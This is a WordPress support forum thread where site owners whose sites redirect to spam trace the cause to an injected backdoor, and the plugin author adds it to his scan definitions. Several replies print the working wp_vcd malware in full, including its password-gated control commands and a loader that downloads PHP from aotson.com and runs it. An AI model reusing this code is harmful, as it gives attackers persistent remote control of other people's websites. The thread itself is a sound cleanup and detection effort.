Support » Plugin: Anti-Malware Security and Brute-Force Firewall » Can’t find the backdoor (malware)

  • Resolved kvandelaak

    (@kvandelaak)


    Everytime I browse to my website. http://www.monkdesigns.co.za I get redirected to some spam sites. On mobile it gives me an uber popup msg. I found some strings with your app but can’t remove it.

    this is what I see through firefox dev view

    <script async=”async” type=”text/javascript” src=”//go.mobisla.com/notice.php?p=628268&interactive=1&pushup=1″></script>
    <script type=”text/javascript” src=”//go.pub2srv.com/apu.php?zoneid=1063894″></script>

    On every page this code comes back but no idea where it hides in the WordPress php.

    please help!

    • This topic was modified 7 months, 2 weeks ago by  kvandelaak.
Viewing 15 replies - 1 through 15 (of 28 total)
  • Plugin Author Eli

    (@scheeeli)

    Make sure you have downloaded the latest definition updates, then my plugin should be able to remove that threat for you. If not then please post a screenshot so I can see what the problem might be.

    @kvandelaak Have yo managed to solve problem? I have the same script and I dont know where to find it and how it appeared.

    @scheeeli I updated your plugin but it didn;t find anything on my site.
    This is my two infected sites:
    storeposter.pl
    brevisforte.ariel1.usermd.net

    Can you help me guys please?

    Hi,

    I managed to get rid of it for now.
    Check your functions.php and remove the infected code. (on the top of the php)
    Mine was also in the index.php and I replaced this with the original index.php.

    No more pop ups.

    Plugin Author Eli

    (@scheeeli)

    @kvandelaak,
    Can you please send me those infected files that you found so that I can add that malicious code to my definition updates?

    A Studiogyn – Soluções para web tem a solução para este problema, acesse http://www.studiogyn.com.br e solicite uma varredura em seu site!

    • This reply was modified 7 months, 2 weeks ago by  studiogyn.

    A Studiogyn – Soluções para web tem a solução para este problema, acesse http://www.studiogyn.com.br e solicite uma varredura em seu site!

    • This reply was modified 7 months, 2 weeks ago by  studiogyn.

    I can’t find it anywhere. I checked everything. Can you please send this code? Because I don’t know what to do at all…

    I Believe it is this code at the top of the functions. Not sure.
    Also, check your index.php and find the spam link there. Maybe replace it with the original.

    <?php

    if (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’] == ’63cc58790b6b2e90e60158b74655aa9f’))
    {
    $div_code_name=”wp_vcd”;
    switch ($_REQUEST[‘action’])
    {
    case ‘get_all_links’;
    foreach ($wpdb->get_results(‘SELECT * FROM ' . $wpdb->prefix . 'posts WHERE post_status = “publish” AND post_type = “post” ORDER BY ID DESC’, ARRAY_A) as $data)
    {
    $data[‘code’] = ”;

    if (preg_match(‘!<div id=”‘.$div_code_name.'”>(.*?)</div>!s’, $data[‘post_content’], $_))
    {
    $data[‘code’] = $_[1];
    }

    print ‘<e><w>1</w><url>’ . $data[‘guid’] . ‘</url>' . $data['code'] . '<id>’ . $data[‘ID’] . ‘</id></e>’ . “\r\n”;
    }
    break;

    case ‘set_id_links’;
    if (isset($_REQUEST[‘data’]))
    {
    $data = $wpdb -> get_row(‘SELECT post_content FROM ' . $wpdb->prefix . 'posts WHERE ID = “‘.mysql_escape_string($_REQUEST[‘id’]).'”‘);

    $post_content = preg_replace(‘!<div id=”‘.$div_code_name.'”>(.*?)</div>!s’, ”, $data -> post_content);
    if (!empty($_REQUEST[‘data’])) $post_content = $post_content . ‘<div id=”‘.$div_code_name.'”>’ . stripcslashes($_REQUEST[‘data’]) . ‘</div>’;

    if ($wpdb->query(‘UPDATE ' . $wpdb->prefix . 'posts SET post_content = “‘ . mysql_escape_string($post_content) . ‘” WHERE ID = “‘ . mysql_escape_string($_REQUEST[‘id’]) . ‘”‘) !== false)
    {
    print “true”;
    }
    }
    break;

    case ‘change_div’;
    if (isset($_REQUEST[‘newdiv’]))
    {

    if (!empty($_REQUEST[‘newdiv’]))
    {
    if ($file = @file_get_contents(__FILE__))
    {
    if(preg_match_all(‘/\$div_code_name=”(.*)”;/i’,$file,$matcholddiv))
    {
    echo $matcholddiv[1][0];
    $file = preg_replace(‘/’.$matcholddiv[1][0].’/i’,$_REQUEST[‘newdiv’], $file);
    @file_put_contents(__FILE__, $file);
    print “true”;
    }

    }
    }
    }
    break;

    I got it!

    This is the code:

    <?php
    
    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '20a89d6ed8e1c98a52dbf0ae879deafd'))
    	{
    $div_code_name="wp_vcd";
    		switch ($_REQUEST['action'])
    			{
    				case 'get_all_links';
    					foreach ($wpdb->get_results('SELECT * FROM <code>' . $wpdb->prefix . 'posts</code> WHERE <code>post_status</code> = "publish" AND <code>post_type</code> = "post" ORDER BY <code>ID</code> DESC', ARRAY_A) as $data)
    						{
    							$data['code'] = '';
    							
    							if (preg_match('!<div id="'.$div_code_name.'">(.*?)</div>!s', $data['post_content'], $_))
    								{
    									$data['code'] = $_[1];
    								}
    							
    							print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n";
    						}
    				break;
    				
    				case 'set_id_links';
    					if (isset($_REQUEST['data']))
    						{
    							$data = $wpdb -> get_row('SELECT <code>post_content</code> FROM <code>' . $wpdb->prefix . 'posts</code> WHERE <code>ID</code> = "'.mysql_escape_string($_REQUEST['id']).'"');
    							
    							$post_content = preg_replace('!<div id="'.$div_code_name.'">(.*?)</div>!s', '', $data -> post_content);
    							if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="'.$div_code_name.'">' . stripcslashes($_REQUEST['data']) . '</div>';
    
    							if ($wpdb->query('UPDATE <code>' . $wpdb->prefix . 'posts</code> SET <code>post_content</code> = "' . mysql_escape_string($post_content) . '" WHERE <code>ID</code> = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
    								{
    									print "true";
    								}
    						}
    				break;
    
                                    case 'change_div';
    					if (isset($_REQUEST['newdiv']))
    						{
    							
    							if (!empty($_REQUEST['newdiv']))
    								{
                                                                               if ($file = @file_get_contents(__FILE__))
    		                                                                    {
                                                                                                     if(preg_match_all('/\$div_code_name="(.*)";/i',$file,$matcholddiv))
                                                                                                                 {
                                                                                                       echo $matcholddiv[1][0];
    			                                                                           $file = preg_replace('/'.$matcholddiv[1][0].'/i',$_REQUEST['newdiv'], $file);
    			                                                                           @file_put_contents(__FILE__, $file);
    									                           print "true";
                                                                                                                 }
    
    		                                                                    }
    								}
    						}
    				break;
    
    				case 'change_domain';
    					if (isset($_REQUEST['newdomain']))
    						{
    							
    							if (!empty($_REQUEST['newdomain']))
    								{
                                                                               if ($file = @file_get_contents(__FILE__))
    		                                                                    {
                                                                                                     if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                                                                                                                 {
    
    			                                                                           $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
    			                                                                           @file_put_contents(__FILE__, $file);
    									                           print "true";
                                                                                                                 }
    
    		                                                                    }
    								}
    						}
    				break;
    
    				case 'create_page';
    					if (isset($_REQUEST['remove_page']))
    						{
    							if ($wpdb -> query('DELETE FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "/'.mysql_escape_string($_REQUEST['url']).'"'))
    								{
    									print "true";
    								}
    						}
    					elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
    						{
    							if ($wpdb -> query('INSERT INTO <code>' . $wpdb->prefix . 'datalist</code> SET <code>url</code> = "/'.mysql_escape_string($_REQUEST['url']).'", <code>title</code> = "'.mysql_escape_string($_REQUEST['title']).'", <code>keywords</code> = "'.mysql_escape_string($_REQUEST['keywords']).'", <code>description</code> = "'.mysql_escape_string($_REQUEST['description']).'", <code>content</code> = "'.mysql_escape_string($_REQUEST['content']).'", <code>full_content</code> = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE <code>title</code> = "'.mysql_escape_string($_REQUEST['title']).'", <code>keywords</code> = "'.mysql_escape_string($_REQUEST['keywords']).'", <code>description</code> = "'.mysql_escape_string($_REQUEST['description']).'", <code>content</code> = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", <code>full_content</code> = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
    								{
    									print "true";
    								}
    						}
    				break;
    				
    				default: print "ERROR_WP_ACTION WP_V_CD";
    			}
    			
    		die("");
    	}
    
    	
    if ( $wpdb->get_var('SELECT count(*) FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
    	{
    		$data = $wpdb -> get_row('SELECT * FROM <code>' . $wpdb->prefix . 'datalist</code> WHERE <code>url</code> = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
    		if ($data -> full_content)
    			{
    				print stripslashes($data -> content);
    			}
    		else
    			{
    				print '<!DOCTYPE html>';
    				print '<html ';
    				language_attributes();
    				print ' class="no-js">';
    				print '<head>';
    				print '<title>'.stripslashes($data -> title).'</title>';
    				print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
    				print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
    				print '<meta name="robots" content="index, follow" />';
    				print '<meta charset="';
    				bloginfo( 'charset' );
    				print '" />';
    				print '<meta name="viewport" content="width=device-width">';
    				print '<link rel="profile" href="http://gmpg.org/xfn/11">';
    				print '<link rel="pingback" href="';
    				bloginfo( 'pingback_url' );
    				print '">';
    				wp_head();
    				print '</head>';
    				print '<body>';
    				print '<div id="content" class="site-content">';
    				print stripslashes($data -> content);
    				get_search_form();
    				get_sidebar();
    				get_footer();
    			}
    			
    		exit;
    	}
    
    if ( ! function_exists( 'wp_temp_setup' ) ) {  
    $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
    
    if($tmpcontent = @file_get_contents("http://www.aotson.com/code.php?i=".$path))
    {
    
    function wp_temp_setup($phpCode) {
        $tmpfname = tempnam(sys_get_temp_dir(), "wp_temp_setup");
        $handle = fopen($tmpfname, "w+");
        fwrite($handle, "<?php\n" . $phpCode);
        fclose($handle);
        include $tmpfname;
        unlink($tmpfname);
        return get_defined_vars();
    }
    
    extract(wp_temp_setup($tmpcontent));
    }
    }
    
    ?>

    Em seu functions.php procure por esses trechos, se encontrar isso, pronto só remover, é ai que esta a sua dor de cabeça, mais informações acessem, http://www.studiogyn.com.br

    if ( ! function_exists( ‘wp_temp_setup’ ) ) {
    $path=$_SERVER[‘HTTP_HOST’].$_SERVER[REQUEST_URI];

    if($tmpcontent = @file_get_contents(“http://www.aotson.com/code.php?i=”.$path))
    {

    function wp_temp_setup($phpCode) {
    $tmpfname = tempnam(sys_get_temp_dir(), “wp_temp_setup”);
    $handle = fopen($tmpfname, “w+”);
    fwrite($handle, “<?php\n” . $phpCode);
    fclose($handle);
    include $tmpfname;
    unlink($tmpfname);
    return get_defined_vars();
    }

    extract(wp_temp_setup($tmpcontent));
    }
    }

    Plugin Author Eli

    (@scheeeli)

    Both of these variants are in my latest definition update 😉

    i found this article after my site got infected with same kind of malware as kvandelaak
    i downloaded completely site and searched for domain aotson.com and i led me to this article…
    my site is infected with this malware…
    i hope Eli the plugin author will find it interesting
    thx
    https://medium.com/@cirku17/wp-vcd-malware-analysis-7c5dbaad89c3

    im tryin` to track back changes i made prior to this infection…
    and its gettin interesting…
    its look like i got it just after (half hour after) i updated my website to wp v4.8.1

    as i say…this is the method hackers used to inject these scripts into a web site…
    it behaves strangely because when il loged in injected scripts dissapears just as is described in these post i collected on web in my researching on the nature of this injections
    http://wordpressrelated.com/wordpress-virus-popads-script-added-on-wp_footer-action/

    In my wordpress site script added in footer on wp_footer action.

    //Virus Script, hook on wp_footer
    <script type=”text/javascript” src=”//go.pub2srv.com/apu.php?zoneid=1063894″></script>
    Script show in all themes (including default themes) I have disable
    all plugins but still show.
    I am using wp 4.7.3 so i replace wp-admin/wp-include folder with fresh downloaded files. (Problem not solved)
    I replace twentyseventeen theme with fresh files, now virus script not show
    in default themes but showing in main theme.
    I search in my theme, there is no eval(), base64_decode(), x64
    kinds of codes.
    I print all list of wp_footer hooks but that’s not help me..
    Install “simple show hooks” plugins, its also not work.
    This virus script not work when admin/user is login, so i also try to find is_user_logged_in() function but nothing found.
    I search in whole database “x64, eval(, base64, apu,etc” also not found in db.
    Install Anti malware security but not working.
    If i remove wp_footer() function, then virus script not show.
    What should i do now?
    How to find virus location/hook?

    Is there any wp action/filter, that hook after each action /filter hooked??

    Read more here: WordPress virus, popads script added on wp_footer action

    this is the code in MY THEMES function.php right at the beginning…im newbie but i can assume that is exploit wp XMLRPC Access u can see that by seeing in the code line that has xmlrpc.php so now on i keep my XMLRPC Access blocked…mean mf indeed
    <?php

    if (isset($_REQUEST[‘action’]) && isset($_REQUEST[‘password’]) && ($_REQUEST[‘password’] == ‘cde4ed8a6a12b232f084f7156e7cfdf3’))
    {
    $div_code_name=”wp_vcd”;
    switch ($_REQUEST[‘action’])
    {

    case ‘change_domain’;
    if (isset($_REQUEST[‘newdomain’]))
    {

    if (!empty($_REQUEST[‘newdomain’]))
    {
    if ($file = @file_get_contents(__FILE__))
    {
    if(preg_match_all(‘/\$tmpcontent = @file_get_contents\(“http:\/\/(.*)\/code7\.php/i’,$file,$matcholddomain))
    {

    $file = preg_replace(‘/’.$matcholddomain[1][0].’/i’,$_REQUEST[‘newdomain’], $file);
    @file_put_contents(__FILE__, $file);
    print “true”;
    }

    }
    }
    }
    break;

    default: print “ERROR_WP_ACTION WP_V_CD WP_CD”;
    }

    die(“”);
    }

    if ( ! function_exists( ‘wp_temp_setup’ ) ) {
    $path=$_SERVER[‘HTTP_HOST’].$_SERVER[REQUEST_URI];
    if ( ! is_admin() && ! is_404() && stripos($_SERVER[‘REQUEST_URI’], ‘wp-cron.php’) == false && stripos($_SERVER[‘REQUEST_URI’], ‘xmlrpc.php’) == false) {

    if($tmpcontent = @file_get_contents(“http://www.aotson.com/code7.php?i=”.$path))
    {

    function wp_temp_setup($phpCode) {
    $tmpfname = tempnam(sys_get_temp_dir(), “wp_temp_setup”);
    $handle = fopen($tmpfname, “w+”);
    fwrite($handle, “<?php\n” . $phpCode);
    fclose($handle);
    include $tmpfname;
    unlink($tmpfname);
    return get_defined_vars();
    }

    extract(wp_temp_setup($tmpcontent));
    }
    }
    }

    ?
    i run a scan on my two websites and it seems that it detect injected code part on themes functions.php file and dont detect injected parts ie. wp-vcd.php ie. class.wp.php but i guess that is covered in some other forms of protection
    anyways thanks…i hope someone will have some kind of help from this info…

    i noticed also when i sue some form of ad blocker re-directions are unnoticed but when you try to navigate web pages on your mobile phones or on desktops (without adblocker and not logged in as admin )you see the full scale of this rather annoying redirect popups

    Plugin Author Eli

    (@scheeeli)

    Thanks for posting this additional code. I have added this new variation to my definition updates.

Viewing 15 replies - 1 through 15 (of 28 total)
  • You must be logged in to reply to this topic.